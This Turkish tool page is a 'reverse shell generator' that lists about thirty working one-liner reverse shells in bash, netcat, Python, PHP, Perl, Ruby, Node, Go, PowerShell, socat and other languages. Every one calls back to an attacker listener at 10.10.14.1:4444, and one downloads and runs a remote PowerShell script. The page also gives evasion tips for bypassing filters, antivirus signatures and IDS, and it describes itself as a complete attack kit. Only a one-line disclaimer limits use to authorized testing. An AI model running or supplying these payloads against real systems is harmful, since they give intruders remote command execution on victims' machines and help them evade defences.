MagmaNex LogoMagmaNex

Reverse Shell Üretici

IP ve port girin; bash, python, nc, PowerShell ve daha fazlası için tek satırlık reverse shell komutları üretin.

Önce kendi makinende dinleyiciyi çalıştır:
rlwrap nc -lvnp 4444
Bash · bash -i /dev/tcp
bash -i >& /dev/tcp/10.10.14.1/4444 0>&1
Bash · bash 196 fd
0<&196;exec 196<>/dev/tcp/10.10.14.1/4444; sh <&196 >&196 2>&196
Bash · bash readline
exec 5<>/dev/tcp/10.10.14.1/4444;cat <&5 | while read line; do $line 2>&5 >&5; done
Bash · bash ${IFS} (space bypass)
bash${IFS}-i${IFS}>&${IFS}/dev/tcp/10.10.14.1/4444${IFS}0>&1
sh · sh mkfifo
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.1 4444 >/tmp/f
Netcat · nc -e
nc 10.10.14.1 4444 -e /bin/bash
Netcat · nc mkfifo (no -e)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.1 4444 >/tmp/f
Netcat · ncat -e
ncat 10.10.14.1 4444 -e /bin/bash
Netcat · ncat --ssl
ncat --ssl 10.10.14.1 4444 -e /bin/bash
Netcat · ncat udp
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|ncat -u 10.10.14.1 4444 >/tmp/f
Python · python3 pty
python3 -c 'import socket,subprocess,os,pty;s=socket.socket();s.connect(("10.10.14.1",4444));[os.dup2(s.fileno(),f) for f in(0,1,2)];pty.spawn("/bin/bash")'
Python · python3 (env)
export RHOST="10.10.14.1";export RPORT=4444;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'
Python · python2
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"])'
PHP · php exec
php -r '$sock=fsockopen("10.10.14.1",4444);exec("/bin/bash <&3 >&3 2>&3");'
PHP · php system
php -r '$sock=fsockopen("10.10.14.1",4444);system("/bin/bash <&3 >&3 2>&3");'
PHP · php shell_exec
php -r '$s=fsockopen("10.10.14.1",4444);shell_exec("/bin/bash <&3 >&3 2>&3");'
Perl · perl
perl -e 'use Socket;$i="10.10.14.1";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
Ruby · ruby
ruby -rsocket -e'f=TCPSocket.open("10.10.14.1",4444).to_i;exec sprintf("/bin/bash -i <&%d >&%d 2>&%d",f,f,f)'
NodeJS · node
node -e '(function(){var n=require("net"),c=require("child_process"),s=new n.Socket();s.connect(4444,"10.10.14.1",function(){var sh=c.spawn("/bin/bash",[]);s.pipe(sh.stdin);sh.stdout.pipe(s);sh.stderr.pipe(s);});})()'
Lua · lua
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.10.14.1',4444);os.execute('/bin/bash -i <&3 >&3 2>&3');"
Golang · go
echo 'package main;import("net";"os/exec";"os");func main(){c,_:=net.Dial("tcp","10.10.14.1:4444");cmd:=exec.Command("/bin/bash");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go
Java · java
r = Runtime.getRuntime();p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.14.1/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]);p.waitFor()
OpenSSL · openssl (encrypted)
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.10.14.1:4444 > /tmp/s; rm /tmp/s
Other · socat
socat TCP:10.10.14.1:4444 EXEC:/bin/bash
Other · socat (full TTY)
socat TCP:10.10.14.1:4444 EXEC:'/bin/bash',pty,stderr,setsid,sigint,sane
Other · awk
awk 'BEGIN {s = "/inet/tcp/0/10.10.14.1/4444"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
Other · telnet
TF=$(mktemp -u);mkfifo $TF && telnet 10.10.14.1 4444 0<$TF | /bin/bash 1>$TF
Other · xterm (X11)
xterm -display 10.10.14.1:1
PowerShell · PowerShell TCP (one-liner)
powershell -nop -w hidden -ep bypass -c "$c=New-Object System.Net.Sockets.TCPClient("10.10.14.1",4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$r2=$r+"PS "+(pwd).Path+"> ";$sb=([text.encoding]::ASCII).GetBytes($r2);$s.Write($sb,0,$sb.Length);$s.Flush()};$c.Close()"
PowerShell · PowerShell -enc (base64, AV bypass)
powershell -nop -w hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABDAFAAQwBsAGkAZQBuAHQAKAAiADEAMAAuADEAMAAuADEANAAuADEAIgAsADQANAA0ADQAKQA7ACQAcwA9ACQAYwAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAPQAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAPQAkAHMALgBSAGUAYQBkACgAJABiACwAMAAsACQAYgAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAJABkAD0AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiACwAMAAsACQAaQApADsAJAByAD0AKABpAGUAeAAgACQAZAAgADIAPgAmADEAfABPAHUAdAAtAFMAdAByAGkAbgBnACkAOwAkAHIAMgA9ACQAcgArACIAUABTACAAIgArACgAcAB3AGQAKQAuAFAAYQB0AGgAKwAiAD4AIAAiADsAJABzAGIAPQAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcgAyACkAOwAkAHMALgBXAHIAaQB0AGUAKAAkAHMAYgAsADAALAAkAHMAYgAuAEwAZQBuAGcAdABoACkAOwAkAHMALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMALgBDAGwAbwBzAGUAKAApAA==
PowerShell · powercat
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.1/powercat.ps1');powercat -c 10.10.14.1 -p 4444 -e /bin/bash"
Bypass ipuçları: ${IFS} → boşluk filtresi · base64 -d|bash → karakter filtresi · powershell -e → AV/string imzası · ncat --ssl / openssl → IDS şifreleme · TTY: python3 -c 'import pty;pty.spawn("/bin/bash")' sonra stty raw -echo; fg.
⚠️ Eğitim ve yetkili test amaçlıdır. Yalnızca sahibi olduğun veya izinli sistemlerde kullan.

Bu araç ne işe yarar?

Reverse Shell Üretici, dinleyici IP ve port girerek bash, sh, netcat, Python, PHP, Perl, Ruby, Node.js, PowerShell ve daha fazlası için tek satırlık reverse shell komutları oluşturur. Base64 ve URL kodlama seçenekleri, doğru PowerShell -EncodedCommand çıktısı ve bypass ipuçlarıyla tam bir saldırı çantasıdır. Her şey tarayıcıda çalışır.

Nasıl kullanılır?

  1. Dinleyici IP ve portunuzu girin.
  2. İhtiyacınıza uygun komutu veya payload'u seçin.
  3. Komutu kopyalayıp yalnızca yetkili olduğunuz sistemlerde kullanın.

Ne işe yarar?

Bir hedefte komut çalıştırabildiğinizde (RCE, kısıtlı shell, dosya yükleme), reverse shell hedefin kendi makinenize geri bağlanmasını sağlar. Bu araç onlarca dile ait test edilmiş tek satırlık yükleri yer tutucularla hazır verir; LHOST/LPORT'u doldurun, dile uygun olanı kopyalayın. Önce kendi makinenizde 'rlwrap nc -lvnp 4444' ile dinleyiciyi açın.

Kodlama ve bypass

Base64 modu komutu 'echo ... | base64 -d | bash' sarmalına alır ve karakter filtrelerini atlatır; PowerShell için UTF-16LE -enc çıktısı AV string imzalarını kırar. URL modu web payload'ları için yüzde-kodlama yapar. ${IFS} varyantı boşluk filtrelerini, ncat --ssl ve openssl seçenekleri IDS şifrelemeyi sağlar. Shell kararlı hale getirme (TTY upgrade) ipuçları da dahildir.

Sıkça sorulan sorular

Yakaladığım shell yarım kalıyor / Ctrl+C kapatıyor, ne yapmalıyım?

Basit bir shell yakaladıktan sonra 'python3 -c "import pty;pty.spawn(\'/bin/bash\')"' ile PTY'ye yükseltin, sonra Ctrl+Z ile arka plana alıp 'stty raw -echo; fg' çalıştırın ve 'export TERM=xterm' deyin. Artık ok tuşları, sekme tamamlama ve Ctrl+C düzgün çalışır.

nc -e çalışmıyor?

Birçok modern netcat sürümü güvenlik nedeniyle -e bayrağı olmadan derlenir. Bu durumda mkfifo tabanlı varyantı kullanın: 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc LHOST LPORT >/tmp/f'.

Reverse Shell Üretici ücretsiz mi?

Evet. Reverse Shell Üretici ve MagmaNex'teki 300'den fazla aracın tamamı tamamen ücretsizdir, kayıt veya üyelik gerektirmez.

Verilerim güvende mi?

Evet. Tüm işlemler tarayıcınızda yerel olarak çalışır. Girdiğiniz veriler sunucuya gönderilmez, kaydedilmez veya paylaşılmaz.

Mobil cihazda çalışır mı?

Evet. Reverse Shell Üretici telefon, tablet ve bilgisayarda sorunsuz çalışır; ayrı bir uygulama indirmenize gerek yoktur.

🔒 Gizlilik: Tüm işlemler tarayıcınızda yapılır, verileriniz sunucuya gönderilmez.

İlgili Araçlar

Nmap Komut OluşturucuNew

Tarama tipi, port, hız ve NSE seçeneklerini tıklayarak hazır nmap komutu oluşturun.

Msfvenom Payload OluşturucuNew

Platform, payload, LHOST/LPORT ve format seçerek msfvenom komutunuzu oluşturun.

Hashcat Komut OluşturucuNew

Hash tipi, saldırı modu, wordlist ve mask seçerek hashcat komutu oluşturun.

Unix Yetki Yükseltme ReferansıNew

Unix/Linux binary’leriyle shell kaçışı, SUID/sudo yetki yükseltme, dosya okuma/yazma ve capability tekniklerini arayın. Açıklamalı, aranabilir referans.

Windows Yetki Yükseltme ReferansıNew

Token (SeImpersonate/Potato), servis yanlış yapılandırmaları, AlwaysInstallElevated, registry, zamanlanmış görev, DLL hijack, UAC bypass ve kimlik bilgisi tekniklerini arayın. Açıklamalı.

Pentest Cheatsheet (Komut Referansı)New

Sızma testinin her aşaması için açıklamalı komut referansı: enumerasyon, Nmap, SMB, web, parola saldırıları, privesc, pivoting, AD ve daha fazlası. Aranabilir, tek tık kopya.

📝 İlgili Yazılar

Popüler Araçlar